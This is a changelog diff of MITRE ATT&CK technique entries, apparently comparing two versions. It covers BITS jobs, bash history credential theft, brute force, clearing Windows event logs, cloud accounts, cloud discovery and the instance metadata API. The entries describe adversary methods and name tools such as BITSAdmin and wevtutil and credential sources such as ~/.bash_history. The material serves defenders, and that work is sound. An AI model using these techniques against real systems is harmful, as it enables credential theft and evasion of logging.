[PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
external_references[1]['source_name']Microsoft COMCTU BITS Malware June 2016
external_references[1]['description']Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.
external_references[1]['url']https://msdn.microsoft.com/library/windows/desktop/ms680573.aspxhttps://www.secureworks.com/blog/malware-lingers-with-bits
external_references[2]['source_name']Microsoft BITSSymantec BITS May 2007
external_references[2]['description']Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.
external_references[2]['url']https://msdn.microsoft.com/library/windows/desktop/bb968799.aspxhttps://www.symantec.com/connect/blogs/malware-update-windows-update
external_references[3]['source_name']Microsoft BITSAdminElastic - Hunting for Persistence Part 1
external_references[3]['description']Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.
external_references[3]['url']https://msdn.microsoft.com/library/aa362813.aspxhttps://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1
external_references[4]['source_name']CTU BITS Malware June 2016PaloAlto UBoatRAT Nov 2017
external_references[4]['description']Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.
external_references[4]['url']https://www.secureworks.com/blog/malware-lingers-with-bitshttps://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/
external_references[5]['source_name']Mondok Windows PiggyBack BITS May 2007Microsoft Issues with BITS July 2011
external_references[5]['description']Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018.Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.
external_references[5]['url']https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/https://technet.microsoft.com/library/dd939934.aspx
external_references[6]['source_name']Symantec BITS May 2007Microsoft BITS
external_references[6]['description']Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.
external_references[6]['url']https://www.symantec.com/connect/blogs/malware-update-windows-updatehttps://msdn.microsoft.com/library/windows/desktop/bb968799.aspx
external_references[7]['source_name']PaloAlto UBoatRAT Nov 2017Microsoft BITSAdmin
external_references[7]['description']Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.
external_references[7]['url']https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/https://msdn.microsoft.com/library/aa362813.aspx
external_references[8]['source_name']Microsoft Issues with BITS July 2011Microsoft COM
external_references[8]['description']Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.
external_references[8]['url']https://technet.microsoft.com/library/dd939934.aspxhttps://msdn.microsoft.com/library/windows/desktop/ms680573.aspx
external_references[9]['source_name']Elastic - Hunting for Persistence Part 1Mondok Windows PiggyBack BITS May 2007
external_references[9]['description']French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018.
external_references[9]['url']https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1552.003] Unsecured Credentials: Bash History

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may search the bash command history on compromist1Adversaries may search the bash command history on compromis
>ed systems for insecurely stored credentials. Bash keeps tra>ed systems for insecurely stored credentials. Bash keeps tra
>ck of the commands users type on the command-line with the ">ck of the commands users type on the command-line with the "
>history" utility. Once a user logs out, the history is flush>history" utility. Once a user logs out, the history is flush
>ed to the user’s <code>.bash_history</code> file. For each u>ed to the user’s <code>.bash_history</code> file. For each u
>ser, this file resides at the same location: <code>~/.bash_h>ser, this file resides at the same location: <code>~/.bash_h
>istory</code>. Typically, this file keeps track of the user’>istory</code>. Typically, this file keeps track of the user’
>s last 500 commands. Users often type usernames and password>s last 500 commands. Users often type usernames and password
>s on the command-line as parameters to programs, which then >s on the command-line as parameters to programs, which then 
>get saved to this file when they log out. Attackers can abus>get saved to this file when they log out. Adversaries can ab
>e this by looking through the file for potential credentials>use this by looking through the file for potential credentia
>. (Citation: External to DA, the OS X Way)>ls. (Citation: External to DA, the OS X Way)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-02-07 20:48:49.878000+00:002022-03-08 21:34:44.728000+00:00
descriptionAdversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)
x_mitre_version1.01.1

[T1110] Brute Force

Current version: 2.4

Version changed from: 2.3 → 2.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-09-30 19:18:16.672000+00:002022-04-19 21:28:49.481000+00:00
x_mitre_data_sources[1]User Account: User Account AuthenticationApplication Log: Application Log Content
x_mitre_data_sources[2]Application Log: Application Log ContentUser Account: User Account Authentication
x_mitre_version2.32.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMohamed Kmal
x_mitre_platformsNetwork

[T1612] Build Image on Host

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-26 16:45:04.924000+00:002022-04-01 13:04:00.946000+00:00
x_mitre_version1.11.2

[T1070.001] Indicator Removal: Clear Windows Event Logs

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 21:17:03.732000+00:002022-04-20 13:02:07.168000+00:00
external_references[1]['source_name']Microsoft wevtutil Oct 2017Microsoft Clear-EventLog
external_references[1]['description']Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.
external_references[1]['url']https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutilhttps://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog
external_references[3]['source_name']Microsoft Clear-EventLogMicrosoft wevtutil Oct 2017
external_references[3]['description']Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.
external_references[3]['url']https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventloghttps://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil
x_mitre_data_sources[0]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionFile: File Deletion
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution

[T1136.003] Create Account: Cloud Account

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-03-16 12:47:00.192000+00:002022-04-07 13:09:30.819000+00:00
external_references[2]['source_name']Microsoft Support O365 Add Another Admin, October 2019AWS Create IAM User
external_references[2]['description']Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020.
external_references[2]['url']https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22dhttps://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html
external_references[3]['source_name']AWS Create IAM UserGCP Create Cloud Identity Users
external_references[3]['description']AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020.Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020.
external_references[3]['url']https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.htmlhttps://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554
external_references[4]['source_name']GCP Create Cloud Identity UsersMicrosoft Azure AD Users
external_references[4]['description']Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020.Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020.
external_references[4]['url']https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory
external_references[5]['source_name']Microsoft Azure AD UsersMicrosoft Support O365 Add Another Admin, October 2019
external_references[5]['description']Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020.Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.
external_references[5]['url']https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directoryhttps://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsSaaS

[T1078.004] Valid Accounts: Cloud Accounts

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may obtain and abuse credentials of a cloud accot1Adversaries may obtain and abuse credentials of a cloud acco
>unt as a means of gaining Initial Access, Persistence, Privi>unt as a means of gaining Initial Access, Persistence, Privi
>lege Escalation, or Defense Evasion. Cloud accounts are thos>lege Escalation, or Defense Evasion. Cloud accounts are thos
>e created and configured by an organization for use by users>e created and configured by an organization for use by users
>, remote support, services, or for administration of resourc>, remote support, services, or for administration of resourc
>es within a cloud service provider or SaaS application. In s>es within a cloud service provider or SaaS application. In s
>ome cases, cloud accounts may be federated with traditional >ome cases, cloud accounts may be federated with traditional 
>identity management system, such as Window Active Directory.>identity management system, such as Window Active Directory.
> (Citation: AWS Identity Federation)(Citation: Google Federa>(Citation: AWS Identity Federation)(Citation: Google Federat
>ting GC)(Citation: Microsoft Deploying AD Federation)  Compr>ing GC)(Citation: Microsoft Deploying AD Federation)  Compro
>omised credentials for cloud accounts can be used to harvest>mised credentials for cloud accounts can be used to harvest 
> sensitive data from online storage accounts and databases. >sensitive data from online storage accounts and databases. A
>Access to cloud accounts can also be abused to gain Initial >ccess to cloud accounts can also be abused to gain Initial A
>Access to a network by abusing a [Trusted Relationship](http>ccess to a network by abusing a [Trusted Relationship](https
>s://attack.mitre.org/techniques/T1199). Similar to [Domain A>://attack.mitre.org/techniques/T1199). Similar to [Domain Ac
>ccounts](https://attack.mitre.org/techniques/T1078/002), com>counts](https://attack.mitre.org/techniques/T1078/002), comp
>promise of federated cloud accounts may allow adversaries to>romise of federated cloud accounts may allow adversaries to 
> more easily move laterally within an environment.>more easily move laterally within an environment.  Once a cl
 >oud account is compromised, an adversary may perform [Accoun
 >t Manipulation](https://attack.mitre.org/techniques/T1098) -
 > for example, by adding [Additional Cloud Roles](https://att
 >ack.mitre.org/techniques/T1098/003) - to maintain persistenc
 >e and potentially escalate their privileges.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 17:48:05.659000+00:002022-04-19 20:23:33.894000+00:00
descriptionAdversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges.
x_mitre_version1.31.4
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Metadata
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Metadata

[T1580] Cloud Infrastructure Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1An adversary may attempt to discover resources that are avait1An adversary may attempt to discover infrastructure and reso
>lable within an infrastructure-as-a-service (IaaS) environme>urces that are available within an infrastructure-as-a-servi
>nt. This includes compute service resources such as instance>ce (IaaS) environment. This includes compute service resourc
>s, virtual machines, and snapshots as well as resources of o>es such as instances, virtual machines, and snapshots as wel
>ther services including the storage and database services.  >l as resources of other services including the storage and d
>Cloud providers offer methods such as APIs and commands issu>atabase services.  Cloud providers offer methods such as API
>ed through CLIs to serve information about infrastructure. F>s and commands issued through CLIs to serve information abou
>or example, AWS provides a <code>DescribeInstances</code> AP>t infrastructure. For example, AWS provides a <code>Describe
>I within the Amazon EC2 API that can return information abou>Instances</code> API within the Amazon EC2 API that can retu
>t one or more instances within an account, the <code>ListBuc>rn information about one or more instances within an account
>kets</code> API that returns a list of all buckets owned by >, the <code>ListBuckets</code> API that returns a list of al
>the authenticated sender of the request, or the <code>GetPub>l buckets owned by the authenticated sender of the request, 
>licAccessBlock</code> API to retrieve access block configura>the <code>HeadBucket</code> API to determine a bucket’s exis
>tion for a bucket (Citation: Amazon Describe Instance)(Citat>tence along with access permissions of the request sender, o
>ion: Amazon Describe Instances API)(Citation: AWS Get Public>r the <code>GetPublicAccessBlock</code> API to retrieve acce
> Access Block) Similarly, GCP's Cloud SDK CLI provides the>ss block configuration for a bucket.(Citation: Amazon Descri
> <code>gcloud compute instances list</code> command to list >be Instance)(Citation: Amazon Describe Instances API)(Citati
>all Google Compute Engine instances in a project (Citation: >on: AWS Get Public Access Block)(Citation: AWS Head Bucket) 
>Google Compute Instances), and Azure's CLI command <code>az >Similarly, GCP's Cloud SDK CLI provides the <code>gcloud com
>vm list</code> lists details of virtual machines.(Citation: >pute instances list</code> command to list all Google Comput
>Microsoft AZ CLI)  An adversary may enumerate resources usin>e Engine instances in a project (Citation: Google Compute In
>g a compromised user's access keys to determine which are av>stances), and Azure's CLI command <code>az vm list</code> li
>ailable to that user.(Citation: Expel IO Evil in AWS) The di>sts details of virtual machines.(Citation: Microsoft AZ CLI)
>scovery of these available resources may help adversaries de> In addition to API commands, adversaries can utilize open s
>termine their next steps in the Cloud environment, such as e>ource tools to discover cloud storage infrastructure through
>stablishing Persistence.(Citation: Mandiant M-Trends 2020)An> [Wordlist Scanning](https://attack.mitre.org/techniques/T15
> adversary may also use this information to change the confi>95/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioure
>guration to make the bucket publicly accessible, allowing da>as)  An adversary may enumerate resources using a compromise
>ta to be accessed without authentication. Adversaries have a>d user's access keys to determine which are available to tha
>lso may use infrastructure discovery APIs such as <code>Desc>t user.(Citation: Expel IO Evil in AWS) The discovery of the
>ribeDBInstances</code> to determine size, owner, permissions>se available resources may help adversaries determine their 
>, and network ACLs of database resources. (Citation: AWS Des>next steps in the Cloud environment, such as establishing Pe
>cribe DB Instances) Adversaries can use this information to >rsistence.(Citation: Mandiant M-Trends 2020)An adversary may
>determine the potential value of databases and discover the > also use this information to change the configuration to ma
>requirements to access them. Unlike in [Cloud Service Discov>ke the bucket publicly accessible, allowing data to be acces
>ery](https://attack.mitre.org/techniques/T1526), this techni>sed without authentication. Adversaries have also may use in
>que focuses on the discovery of components of the provided s>frastructure discovery APIs such as <code>DescribeDBInstance
>ervices rather than the services themselves.>s</code> to determine size, owner, permissions, and network 
 >ACLs of database resources. (Citation: AWS Describe DB Insta
 >nces) Adversaries can use this information to determine the 
 >potential value of databases and discover the requirements t
 >o access them. Unlike in [Cloud Service Discovery](https://a
 >ttack.mitre.org/techniques/T1526), this technique focuses on
 > the discovery of components of the provided services rather
 > than the services themselves.

Dropped Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-09-02 14:42:19.761000+00:002022-04-20 19:03:12.977000+00:00
descriptionAn adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas) An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
external_references[1]['source_name']Amazon Describe InstanceExpel IO Evil in AWS
external_references[1]['description']Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.
external_references[1]['url']https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.htmlhttps://expel.io/blog/finding-evil-in-aws/
external_references[2]['source_name']Amazon Describe Instances APIAWS Head Bucket
external_references[2]['description']Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022.
external_references[2]['url']https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.htmlhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
external_references[4]['source_name']Google Compute InstancesAWS Describe DB Instances
external_references[4]['description']Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.Amazon Web Services. (n.d.). Retrieved May 28, 2021.
external_references[4]['url']https://cloud.google.com/sdk/gcloud/reference/compute/instances/listhttps://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
external_references[5]['source_name']Microsoft AZ CLIAmazon Describe Instance
external_references[5]['description']Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.
external_references[5]['url']https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latesthttps://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
external_references[6]['source_name']Expel IO Evil in AWSAmazon Describe Instances API
external_references[6]['description']A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
external_references[6]['url']https://expel.io/blog/finding-evil-in-aws/https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
external_references[7]['source_name']Mandiant M-Trends 2020Google Compute Instances
external_references[7]['description']Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.
external_references[7]['url']https://content.fireeye.com/m-trends/rpt-m-trends-2020https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
external_references[8]['source_name']AWS Describe DB InstancesMandiant M-Trends 2020
external_references[8]['description']Amazon Web Services. (n.d.). Retrieved May 28, 2021.Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.
external_references[8]['url']https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.htmlhttps://content.fireeye.com/m-trends/rpt-m-trends-2020
x_mitre_contributors[1]Isif IbrahimaPraetorian
x_mitre_contributors[2]PraetorianIsif Ibrahima, Mandiant
x_mitre_data_sources[0]Instance: Instance MetadataCloud Storage: Cloud Storage Metadata
x_mitre_data_sources[1]Instance: Instance EnumerationVolume: Volume Enumeration
x_mitre_data_sources[2]Snapshot: Snapshot MetadataSnapshot: Snapshot Enumeration
x_mitre_data_sources[3]Snapshot: Snapshot EnumerationSnapshot: Snapshot Metadata
x_mitre_data_sources[4]Cloud Storage: Cloud Storage MetadataVolume: Volume Metadata
x_mitre_data_sources[6]Volume: Volume MetadataInstance: Instance Metadata
x_mitre_data_sources[7]Volume: Volume EnumerationInstance: Instance Enumeration
x_mitre_detectionEstablish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users and enumerations from unknown or malicious IP addresses. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft AZ CLI', 'description': 'Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.', 'url': 'https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest'}
external_references{'source_name': 'Malwarebytes OSINT Leaky Buckets - Hioureas', 'description': 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.', 'url': 'https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/'}

[T1552.005] Unsecured Credentials: Cloud Instance Metadata API

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to access the Cloud Instance Metadatt1Adversaries may attempt to access the Cloud Instance Metadat
>a API to collect credentials and other sensitive data.  Most>a API to collect credentials and other sensitive data.  Most
> cloud service providers support a Cloud Instance Metadata A> cloud service providers support a Cloud Instance Metadata A
>PI which is a service provided to running virtual instances >PI which is a service provided to running virtual instances 
>that allows applications to access information about the run>that allows applications to access information about the run
>ning virtual instance. Available information generally inclu>ning virtual instance. Available information generally inclu
>des name, security group, and additional metadata including >des name, security group, and additional metadata including 
>sensitive data such as credentials and UserData scripts that>sensitive data such as credentials and UserData scripts that
> may contain additional secrets. The Instance Metadata API i> may contain additional secrets. The Instance Metadata API i
>s provided as a convenience to assist in managing applicatio>s provided as a convenience to assist in managing applicatio
>ns and is accessible by anyone who can access the instance.(>ns and is accessible by anyone who can access the instance.(
>Citation: AWS Instance Metadata API) A cloud metadata API ha>Citation: AWS Instance Metadata API) A cloud metadata API ha
>s been used in at least one high profile compromise.(Citatio>s been used in at least one high profile compromise.(Citatio
>n: Krebs Capital One August 2019)  If adversaries have a pre>n: Krebs Capital One August 2019)  If adversaries have a pre
>sence on the running virtual instance, they may query the In>sence on the running virtual instance, they may query the In
>stance Metadata API directly to identify credentials that gr>stance Metadata API directly to identify credentials that gr
